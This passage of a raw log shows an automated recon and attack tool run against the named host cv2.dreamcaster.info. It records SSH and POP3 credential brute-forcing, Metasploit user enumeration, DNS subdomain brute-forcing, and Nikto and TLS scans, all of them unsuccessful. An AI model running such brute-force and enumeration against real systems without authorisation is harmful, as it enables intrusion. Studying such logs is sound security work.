1191. NSE: [ssh-brute] Trying username/password pair: webadmin:andrea
1192. NSE: [ssh-brute] Trying username/password pair: sysadmin:andrea
1193. NSE: [ssh-brute] Trying username/password pair: netadmin:andrea
1194. NSE: [ssh-brute] Trying username/password pair: guest:andrea
1195. NSE: [ssh-brute] Trying username/password pair: user:andrea
1196. NSE: [ssh-brute] Trying username/password pair: web:andrea
1197. NSE: [ssh-brute] Trying username/password pair: test:andrea
1198. NSE: [ssh-brute] Trying username/password pair: root:jennifer
1199. NSE: [ssh-brute] Trying username/password pair: admin:jennifer
1200. NSE: [ssh-brute] Trying username/password pair: administrator:jennifer
1201. NSE: [ssh-brute] Trying username/password pair: webadmin:jennifer
1202. NSE: [ssh-brute] Trying username/password pair: sysadmin:jennifer
1203. NSE: [ssh-brute] Trying username/password pair: netadmin:jennifer
1204. NSE: [ssh-brute] Trying username/password pair: guest:jennifer
1205. NSE: [ssh-brute] Trying username/password pair: user:jennifer
1206. NSE: [ssh-brute] Trying username/password pair: web:jennifer
1207. NSE: [ssh-brute] Trying username/password pair: test:jennifer
1208. NSE: [ssh-brute] Trying username/password pair: root:joshua
1209. NSE: [ssh-brute] Trying username/password pair: admin:joshua
1210. NSE: [ssh-brute] Trying username/password pair: administrator:joshua
1211. NSE: [ssh-brute] Trying username/password pair: webadmin:joshua
1212. NSE: [ssh-brute] Trying username/password pair: sysadmin:joshua
1213. NSE: [ssh-brute] Trying username/password pair: netadmin:joshua
1214. NSE: [ssh-brute] Trying username/password pair: guest:joshua
1215. NSE: [ssh-brute] Trying username/password pair: user:joshua
1216. NSE: [ssh-brute] Trying username/password pair: web:joshua
1217. NSE: [ssh-brute] Trying username/password pair: test:joshua
1218. NSE: [ssh-brute] Trying username/password pair: root:carlos
1219. NSE: [ssh-brute] Trying username/password pair: admin:carlos
1220. NSE: [ssh-brute] Trying username/password pair: administrator:carlos
1221. NSE: [ssh-brute] Trying username/password pair: webadmin:carlos
1222. NSE: [ssh-brute] Trying username/password pair: sysadmin:carlos
1223. NSE: [ssh-brute] Trying username/password pair: netadmin:carlos
1224. NSE: [ssh-brute] Trying username/password pair: guest:carlos
1225. NSE: [ssh-brute] Trying username/password pair: user:carlos
1226. NSE: [ssh-brute] Trying username/password pair: web:carlos
1227. NSE: [ssh-brute] Trying username/password pair: test:carlos
1228. NSE: [ssh-brute] Trying username/password pair: root:superman
1229. NSE: [ssh-brute] Trying username/password pair: admin:superman
1230. NSE: [ssh-brute] Trying username/password pair: administrator:superman
1231. NSE: [ssh-brute] Trying username/password pair: webadmin:superman
1232. NSE: [ssh-brute] Trying username/password pair: sysadmin:superman
1233. NSE: [ssh-brute] Trying username/password pair: netadmin:superman
1234. NSE: [ssh-brute] Trying username/password pair: guest:superman
1235. NSE: [ssh-brute] Trying username/password pair: user:superman
1236. NSE: [ssh-brute] Trying username/password pair: web:superman
1237. NSE: [ssh-brute] Trying username/password pair: test:superman
1238. Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
1239. Host is up (0.12s latency).
1240. rDNS record for 80.82.69.63: jademonitor.net
1241.  
1242. PORT STATE SERVICE VERSION
1243. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
1244. | ssh-auth-methods:
1245. | Supported authentication methods:
1246. | publickey
1247. | gssapi-keyex
1248. | gssapi-with-mic
1249. |_ password
1250. | ssh-brute:
1251. | Accounts: No valid accounts found
1252. |_ Statistics: Performed 480 guesses in 182 seconds, average tps: 2.6
1253. | ssh-hostkey:
1254. | 1024 8e:e7:56:ea:03:ad:32:fe:55:c7:ac:da:71:96:9b:f9 (DSA)
1255. |_ 2048 a7:8a:8f:c3:77:e7:10:4e:72:be:41:a8:9a:70:41:d7 (RSA)
1256. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
1257. |_ssh-run: Failed to specify credentials and command to run.
1258. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1259. Device type: general purpose
1260. Running: Linux 2.6.X
1261. OS CPE: cpe:/o:linux:linux_kernel:2.6.39
1262. OS details: Linux 2.6.39
1263. Network Distance: 10 hops
1264.  
1265. TRACEROUTE (using port 22/tcp)
1266. HOP RTT ADDRESS
1267. 1 111.47 ms 10.13.0.1
1268. 2 117.23 ms 37.187.24.252
1269. 3 111.49 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
1270. 4 ...
1271. 5 120.23 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
1272. 6 ...
1273. 7 138.00 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
1274. 8 121.50 ms 176.10.83.119
1275. 9 ...
1276. 10 121.27 ms jademonitor.net (80.82.69.63)
1277.  
1278. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1279. Nmap done: 1 IP address (1 host up) scanned in 195.27 seconds
1280.  
1281. ____________
1282. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
1283. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
1284. [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
1285. [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
1286. [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
1287. [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
1288. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
1289. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
1290. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
1291. [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
1292.  
1293.  
1294. =[ metasploit v4.16.8-dev ]
1295. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
1296. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
1297. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
1298.  
1299. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
1300. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
1301. [-] Unknown command: “spool.
1302. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
1303. RHOSTS => cv2.dreamcaster.info
1304. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
1305. RHOST => cv2.dreamcaster.info
1306. [*] 80.82.69.63:22 - SSH - Checking for false positives
1307. [*] 80.82.69.63:22 - SSH - Starting scan
1308. [-] 80.82.69.63:22 - SSH - User 'admin' not found
1309. [-] 80.82.69.63:22 - SSH - User 'administrator' not found
1310. [-] 80.82.69.63:22 - SSH - User 'anonymous' not found
1311. [-] 80.82.69.63:22 - SSH - User 'backup' not found
1312. [-] 80.82.69.63:22 - SSH - User 'bee' not found
1313. [-] 80.82.69.63:22 - SSH - User 'ftp' not found
1314. [-] 80.82.69.63:22 - SSH - User 'guest' not found
1315. [-] 80.82.69.63:22 - SSH - User 'GUEST' not found
1316. [-] 80.82.69.63:22 - SSH - User 'info' not found
1317. [-] 80.82.69.63:22 - SSH - User 'mail' not found
1318. [-] 80.82.69.63:22 - SSH - User 'mailadmin' not found
1319. [-] 80.82.69.63:22 - SSH - User 'msfadmin' not found
1320. [-] 80.82.69.63:22 - SSH - User 'mysql' not found
1321. [-] 80.82.69.63:22 - SSH - User 'nobody' not found
1322. [-] 80.82.69.63:22 - SSH - User 'oracle' not found
1323. [-] 80.82.69.63:22 - SSH - User 'owaspbwa' not found
1324. [-] 80.82.69.63:22 - SSH - User 'postfix' not found
1325. [-] 80.82.69.63:22 - SSH - User 'postgres' not found
1326. [-] 80.82.69.63:22 - SSH - User 'private' not found
1327. [-] 80.82.69.63:22 - SSH - User 'proftpd' not found
1328. [-] 80.82.69.63:22 - SSH - User 'public' not found
1329. [-] 80.82.69.63:22 - SSH - User 'root' not found
1330. [-] 80.82.69.63:22 - SSH - User 'superadmin' not found
1331. [-] 80.82.69.63:22 - SSH - User 'support' not found
1332. [-] 80.82.69.63:22 - SSH - User 'sys' not found
1333. [-] 80.82.69.63:22 - SSH - User 'system' not found
1334. [-] 80.82.69.63:22 - SSH - User 'systemadmin' not found
1335. [-] 80.82.69.63:22 - SSH - User 'systemadministrator' not found
1336. [-] 80.82.69.63:22 - SSH - User 'test' not found
1337. [-] 80.82.69.63:22 - SSH - User 'tomcat' not found
1338. [-] 80.82.69.63:22 - SSH - User 'user' not found
1339. [-] 80.82.69.63:22 - SSH - User 'webmaster' not found
1340. [-] 80.82.69.63:22 - SSH - User 'www-data' not found
1341. [-] 80.82.69.63:22 - SSH - User 'Fortimanager_Access' not found
1342. [*] Scanned 1 of 1 hosts (100% complete)
1343. [*] Auxiliary module execution completed
1344. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
1345. [+] 80.82.69.63:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
1346. [*] cv2.dreamcaster.info:22 - Scanned 1 of 1 hosts (100% complete)
1347. [*] Auxiliary module execution completed
1348. + -- --=[Port 23 closed... skipping.
1349. + -- --=[Port 25 closed... skipping.
1350. + -- --=[Port 53 opened... running tests...
1351.  
1352. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 22:44 EDT
1353. Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
1354. Host is up (0.12s latency).
1355. rDNS record for 80.82.69.63: jademonitor.net
1356.  
1357. PORT STATE SERVICE VERSION
1358. 53/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
1359. |_dns-cache-snoop: 0 of 100 tested domains are cached.
1360. |_dns-fuzz: The server seems impervious to our assault.
1361. | dns-nsec-enum:
1362. |_ No NSEC records found
1363. | dns-nsec3-enum:
1364. |_ DNSSEC NSEC3 not supported
1365. | dns-nsid:
1366. |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.62.rc1.el6_9.4
1367. Too many fingerprints match this host to give specific OS details
1368. Network Distance: 10 hops
1369. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:6
1370.  
1371. Host script results:
1372. | dns-brute:
1373. | DNS Brute-force hostnames:
1374. | mail.dreamcaster.info - 80.82.69.63
1375. | www.dreamcaster.info - 80.82.69.63
1376. | ftp.dreamcaster.info - 80.82.69.63
1377. |_ smtp.dreamcaster.info - 80.82.69.63
1378.  
1379. TRACEROUTE (using port 53/udp)
1380. HOP RTT ADDRESS
1381. 1 111.54 ms 10.13.0.1
1382. 2 ...
1383. 3 111.82 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
1384. 4 112.79 ms 10.95.33.8
1385. 5 120.34 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
1386. 6 ...
1387. 7 178.85 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
1388. 8 121.86 ms 176.10.83.119
1389. 9 ...
1390. 10 121.93 ms jademonitor.net (80.82.69.63)
1391.  
1392. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1393. Nmap done: 1 IP address (1 host up) scanned in 613.97 seconds
1394. + -- --=[Port 79 closed... skipping.
1395. + -- --=[Port 80 opened... running tests...
1396. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
1397.  
1398. ^ ^
1399. _ __ _ ____ _ __ _ _ ____
1400. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1401. | V V // o // _/ | V V // 0 // 0 // _/
1402. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1403. <
1404. ...'
1405.  
1406. WAFW00F - Web Application Firewall Detection Tool
1407.  
1408. By Sandro Gauci && Wendel G. Henrique
1409.  
1410. Checking http://cv2.dreamcaster.info
1411. Generic Detection results:
1412. No WAF detected by the generic detection
1413. Number of requests: 13
1414.  
1415. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
1416. http://cv2.dreamcaster.info [200 OK] Apache[2], Country[NETHERLANDS][NL], HTTPServer[Apache/2], IP[80.82.69.63], Script[JavaScript], Title[CandyViVa - Candid Video Vault - ARCHIVE 2]
1417.  
1418. __ ______ _____
1419. \ \/ / ___|_ _|
1420. \ /\___ \ | |
1421. / \ ___) || |
1422. /_/\_|____/ |_|
1423.  
1424. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
1425. + -- --=[Target: cv2.dreamcaster.info:80
1426. + -- --=[Site not vulnerable to Cross-Site Tracing!
1427. + -- --=[Site not vulnerable to Host Header Injection!
1428. + -- --=[Site vulnerable to Cross-Frame Scripting!
1429. + -- --=[Site vulnerable to Clickjacking!
1430.  
1431. HTTP/1.1 400 Bad Request
1432. Date: Sat, 30 Sep 2017 03:00:48 GMT
1433. Server: Apache/2
1434. Accept-Ranges: bytes
1435. Vary: Accept-Encoding,User-Agent
1436. Connection: close
1437. Content-Type: text/html
1438.  
1439. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1440. <HTML><HEAD>
1441. <TITLE>400 Bad Request</TITLE>
1442. </HEAD><BODY>
1443. <H1>Bad Request</H1>
1444. There was an error in your request.
1445. <HR>
1446. <I>(none)</I>
1447. </BODY></HTML>
1448.  
1449. HTTP/1.1 400 Bad Request
1450. Date: Sat, 30 Sep 2017 03:00:48 GMT
1451. Server: Apache/2
1452. Accept-Ranges: bytes
1453. Vary: Accept-Encoding,User-Agent
1454. Connection: close
1455. Content-Type: text/html
1456.  
1457. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1458. <HTML><HEAD>
1459. <TITLE>400 Bad Request</TITLE>
1460. </HEAD><BODY>
1461. <H1>Bad Request</H1>
1462. There was an error in your request.
1463. <HR>
1464. <I>(none)</I>
1465. </BODY></HTML>
1466. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
1467. + -- --=[Checking if X-Content options are enabled on cv2.dreamcaster.info...
1468.  
1469. + -- --=[Checking if X-Frame options are enabled on cv2.dreamcaster.info...
1470.  
1471. + -- --=[Checking if X-XSS-Protection header is enabled on cv2.dreamcaster.info...
1472.  
1473. + -- --=[Checking HTTP methods on cv2.dreamcaster.info...
1474. Allow: GET,POST,OPTIONS,HEAD
1475.  
1476. + -- --=[Checking if TRACE method is enabled on cv2.dreamcaster.info...
1477.  
1478. + -- --=[Checking for META tags on cv2.dreamcaster.info...
1479. <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
1480.  
1481. + -- --=[Checking for open proxy on cv2.dreamcaster.info...
1482. <tr><td>To change this page, upload your website into the public_html directory</td></tr>
1483. <tr><td><img src="logo.png"></td></tr>
1484. <tr><td style="font-size: 8pt">Date Created: Wed May 13 17:45:58 2015</td></tr>
1485. </table>
1486. <br><br>
1487.  
1488. </center>
1489. </body>
1490.  
1491. </html>
1492.  
1493. + -- --=[Enumerating software on cv2.dreamcaster.info...
1494. Server: Apache/2
1495.  
1496. + -- --=[Checking if Strict-Transport-Security is enabled on cv2.dreamcaster.info...
1497.  
1498. + -- --=[Checking for Flash cross-domain policy on cv2.dreamcaster.info...
1499. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1500. <html><head>
1501. <title>404 Not Found</title>
1502. </head><body>
1503. <h1>Not Found</h1>
1504. <p>The requested URL /crossdomain.xml was not found on this server.</p>
1505. <p>Additionally, a 404 Not Found
1506. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1507. </body></html>
1508.  
1509. + -- --=[Checking for Silverlight cross-domain policy on cv2.dreamcaster.info...
1510. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1511. <html><head>
1512. <title>404 Not Found</title>
1513. </head><body>
1514. <h1>Not Found</h1>
1515. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
1516. <p>Additionally, a 404 Not Found
1517. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1518. </body></html>
1519.  
1520. + -- --=[Checking for HTML5 cross-origin resource sharing on cv2.dreamcaster.info...
1521.  
1522. + -- --=[Retrieving robots.txt on cv2.dreamcaster.info...
1523. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1524. <html><head>
1525. <title>404 Not Found</title>
1526. </head><body>
1527. <h1>Not Found</h1>
1528. <p>The requested URL /robots.txt was not found on this server.</p>
1529. <p>Additionally, a 404 Not Found
1530. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1531. </body></html>
1532.  
1533. + -- --=[Retrieving sitemap.xml on cv2.dreamcaster.info...
1534. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
1535. <html><head>
1536. <title>404 Not Found</title>
1537. </head><body>
1538. <h1>Not Found</h1>
1539. <p>The requested URL /sitemap.xml was not found on this server.</p>
1540. <p>Additionally, a 404 Not Found
1541. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1542. </body></html>
1543.  
1544. + -- --=[Checking cookie attributes on cv2.dreamcaster.info...
1545.  
1546. + -- --=[Checking for ASP.NET Detailed Errors on cv2.dreamcaster.info...
1547. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1548. error was encountered while trying to use an ErrorDocument to handle the request.</p>
1549.  
1550.  
1551. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
1552. - Nikto v2.1.6
1553. ---------------------------------------------------------------------------
1554. + Target IP: 80.82.69.63
1555. + Target Hostname: cv2.dreamcaster.info
1556. + Target Port: 80
1557. + Start Time: 2017-09-29 22:54:27 (GMT-4)
1558. ---------------------------------------------------------------------------
1559. + Server: Apache/2
1560. + Server leaks inodes via ETags, header found with file /, fields: 0x17a3 0x49c412f0c86c0
1561. + The anti-clickjacking X-Frame-Options header is not present.
1562. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
1563. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
1564. + Apache/2 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
1565. + Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
1566. + Retrieved x-powered-by header: PHP/5.3.29
1567. + Uncommon header 'x-ob_mode' found, with contents: 1
1568. + OSVDB-3092: /phpMyAdmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
1569. + OSVDB-3092: /phpmyadmin/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
1570. + OSVDB-3092: /pma/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
1571. + Cookie SQMSESSID created without the httponly flag
1572. + OSVDB-3093: /squirrelmail/src/read_body.php: SquirrelMail found
1573. + OSVDB-3093: /webmail/src/read_body.php: SquirrelMail found
1574. + OSVDB-3268: /icons/: Directory indexing found.
1575. + OSVDB-3233: /icons/README: Apache default file found.
1576. + /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
1577. + 8463 requests: 0 error(s) and 17 item(s) reported on remote host
1578. + End Time: 2017-09-29 23:14:12 (GMT-4) (1185 seconds)
1579. ---------------------------------------------------------------------------
1580. + 1 host(s) tested
1581. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
1582. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/cv2.dreamcaster.info-port80.jpg
1583. + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
1584. + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
1585.  
1586. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
1587. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
1588. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
1589. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
1590. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
1591. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
1592. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
1593.  
1594. __[ ! ] Neither war between hackers, nor peace for the system.
1595. __[ ! ] http://blog.inurl.com.br
1596. __[ ! ] http://fb.com/InurlBrasil
1597. __[ ! ] http://twitter.com/@googleinurl
1598. __[ ! ] http://github.com/googleinurl
1599. __[ ! ] Current PHP version::[ 7.0.22-3 ]
1600. __[ ! ] Current script owner::[ root ]
1601. __[ ! ] Current uname::[ Linux Kali 4.12.0-kali2-amd64 #1 SMP Debian 4.12.12-2kali1 (2017-09-13) x86_64 ]
1602. __[ ! ] Current pwd::[ /usr/share/sniper ]
1603. __[ ! ] Help: php inurlbr.php --help
1604. ------------------------------------------------------------------------------------------------------------------------
1605.  
1606. [ ! ] Starting SCANNER INURLBR 2.1 at [29-09-2017 23:17:05]
1607. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
1608. It is the end user's responsibility to obey all applicable local, state and federal laws.
1609. Developers assume no liability and are not responsible for any misuse or damage caused by this program
1610.  
1611. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cv2.dreamcaster.info.txt ]
1612. [ INFO ][ DORK ]::[ site:cv2.dreamcaster.info ]
1613. [ INFO ][ SEARCHING ]:: {
1614. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sk ]
1615.  
1616. [ INFO ][ SEARCHING ]::
1617. -[:::]
1618. [ INFO ][ ENGINE ]::[ GOOGLE API ]
1619.  
1620. [ INFO ][ SEARCHING ]::
1621. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1622. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.bd ID: 012873187529719969291:yexdhbzntue ]
1623.  
1624. [ INFO ][ SEARCHING ]::
1625. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
1626.  
1627. [ INFO ][ TOTAL FOUND VALUES ]:: [ 0 ]
1628. [ INFO ] Not a satisfactory result was found!
1629.  
1630.  
1631. [ INFO ] [ Shutting down ]
1632. [ INFO ] [ End of process INURLBR at [29-09-2017 23:17:15]
1633. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
1634. [ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-cv2.dreamcaster.info.txt ]
1635. |_________________________________________________________________________________________
1636.  
1637. \_________________________________________________________________________________________/
1638.  
1639. + -- --=[Port 110 opened... running tests...
1640.  
1641. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 23:17 EDT
1642. Nmap scan report for cv2.dreamcaster.info (80.82.69.63)
1643. Host is up (0.12s latency).
1644. rDNS record for 80.82.69.63: jademonitor.net
1645.  
1646. PORT STATE SERVICE VERSION
1647. 110/tcp open pop3 Dovecot DirectAdmin pop3d
1648. | pop3-brute:
1649. | Accounts: No valid accounts found
1650. |_ Statistics: Performed 235 guesses in 196 seconds, average tps: 1.2
1651. |_pop3-capabilities: USER UIDL SASL(PLAIN) AUTH-RESP-CODE STLS RESP-CODES CAPA TOP PIPELINING
1652. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1653. Aggressive OS guesses: Linux 2.6.39 (98%), Linux 2.6.32 (94%), Linux 2.6.32 or 3.10 (94%), Synology DiskStation Manager 5.1 (94%), Linux 2.6.18 - 2.6.22 (94%), WatchGuard Fireware 11.8 (93%), Linux 3.10 (93%), Linux 3.4 (92%), Linux 2.6.32 - 2.6.39 (92%), Linux 3.1 - 3.2 (91%)
1654. No exact OS matches for host (test conditions non-ideal).
1655. Network Distance: 10 hops
1656.  
1657. TRACEROUTE (using port 110/tcp)
1658. HOP RTT ADDRESS
1659. 1 111.40 ms 10.13.0.1
1660. 2 111.92 ms 37.187.24.252
1661. 3 111.69 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
1662. 4 ...
1663. 5 120.20 ms be100-1109.fra-1-a9.de.eu (213.186.32.213)
1664. 6 ...
1665. 7 221.96 ms vlan3555.bb1.ams2.nl.m247.com (176.10.83.128)
1666. 8 221.96 ms 176.10.83.119
1667. 9 ...
1668. 10 121.49 ms jademonitor.net (80.82.69.63)
1669.  
1670. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1671. Nmap done: 1 IP address (1 host up) scanned in 211.89 seconds
1672. + -- --=[Port 111 closed... skipping.
1673. + -- --=[Port 135 closed... skipping.
1674. + -- --=[Port 139 closed... skipping.
1675. + -- --=[Port 161 closed... skipping.
1676. + -- --=[Port 162 closed... skipping.
1677. + -- --=[Port 389 closed... skipping.
1678. + -- --=[Port 443 opened... running tests...
1679. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
1680.  
1681. ^ ^
1682. _ __ _ ____ _ __ _ _ ____
1683. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1684. | V V // o // _/ | V V // 0 // 0 // _/
1685. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1686. <
1687. ...'
1688.  
1689. WAFW00F - Web Application Firewall Detection Tool
1690.  
1691. By Sandro Gauci && Wendel G. Henrique
1692.  
1693. Checking https://cv2.dreamcaster.info
1694. ERROR:root:Site https://cv2.dreamcaster.info appears to be down
1695.  
1696. + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
1697. ____ _ _ _____ _ _
1698. / ___| | ___ _ _ __| | ___|_ _(_) |
1699. | | | |/ _ \| | | |/ _` | |_ / _` | | |
1700. | |___| | (_) | |_| | (_| | _| (_| | | |
1701. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
1702. v1.0.1 by m0rtem
1703.  
1704.  
1705. [23:20:49] Initializing CloudFail - the date is: 29/09/2017
1706. [23:20:49] Fetching initial information from: cv2.dreamcaster.info...
1707. [23:20:49] Server IP: 80.82.69.63
1708. [23:20:49] Testing if cv2.dreamcaster.info is on the Cloudflare network...
1709. [23:20:49] cv2.dreamcaster.info is not part of the Cloudflare network, quitting...
1710. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
1711. https://cv2.dreamcaster.info [200 OK] Apache[2][Default], Country[NETHERLANDS][NL], HTTPServer[Apache/2], IP[80.82.69.63]
1712.  
1713. + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
1714.  
1715.  
1716.  
1717. AVAILABLE PLUGINS
1718. -----------------
1719.  
1720. PluginSessionResumption
1721. PluginOpenSSLCipherSuites
1722. PluginCertInfo
1723. PluginHSTS
1724. PluginHeartbleed
1725. PluginCompression
1726. PluginChromeSha1Deprecation
1727. PluginSessionRenegotiation
1728.  
1729.  
1730.  
1731. CHECKING HOST(S) AVAILABILITY
1732. -----------------------------
1733.  
1734. cv2.dreamcaster.info:443 => 80.82.69.63:443
1735.  
1736.  
1737.  
1738. SCAN RESULTS FOR CV2.DREAMCASTER.INFO:443 - 80.82.69.63:443
1739. -----------------------------------------------------------
1740.  
1741. * Session Renegotiation:
1742. Client-initiated Renegotiations: OK - Rejected
1743. Secure Renegotiation: OK - Supported
1744.  
1745. * Deflate Compression:
1746. OK - Compression disabled
1747.  
1748. * Certificate - Content:
1749. SHA1 Fingerprint: 19ea54ceff0e77b003342b0aaa9ea481f5650116
1750. Common Name: localhost
1751. Issuer: localhost
1752. Serial Number: 831942CF510F668A
1753. Not Before: Oct 1 09:40:25 2015 GMT
1754. Not After: Feb 15 09:40:25 2043 GMT
1755. Signature Algorithm: sha1WithRSAEncryption
1756. Public Key Algorithm: rsaEncryption
1757. Key Size: 2048 bit
1758. Exponent: 65537 (0x10001)
1759.  
1760. * Certificate - Trust:
1761. Hostname Validation: FAILED - Certificate does NOT match cv2.dreamcaster.info
1762. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1763. Java 6 CA Store (Update 65): FAILED - Certificate is NOT Trusted: self signed certificate
1764. Microsoft CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1765. Apple CA Store (OS X 10.10.5): FAILED - Certificate is NOT Trusted: self signed certificate
1766. Mozilla NSS CA Store (09/2015): FAILED - Certificate is NOT Trusted: self signed certificate
1767. Certificate Chain Received: ['localhost']
1768.  
1769. * Certificate - OCSP Stapling:
1770. NOT SUPPORTED - Server did not send back an OCSP response.
1771.  
1772. * SSLV2 Cipher Suites:
1773. Server rejected all cipher suites.
1774.  
1775. * Session Resumption:
1776. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1777. With TLS Session Tickets: OK - Supported
1778.  
1779. * SSLV3 Cipher Suites:
1780. Server rejected all cipher suites.
1781.  
1782.  
1783.  
1784. SCAN COMPLETED IN 5.62 S
1785. ------------------------
1786. Version: 1.11.10-static
1787. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1788.  
1789. Testing SSL server cv2.dreamcaster.info on port 443 using SNI name cv2.dreamcaster.info
1790.  
1791. TLS Fallback SCSV:
1792. Server supports TLS Fallback SCSV
1793.  
1794. TLS renegotiation:
1795. Secure session renegotiation supported
1796.  
1797. TLS Compression:
1798. Compression disabled
1799.  
1800. Heartbleed:
1801. TLS 1.2 not vulnerable to heartbleed
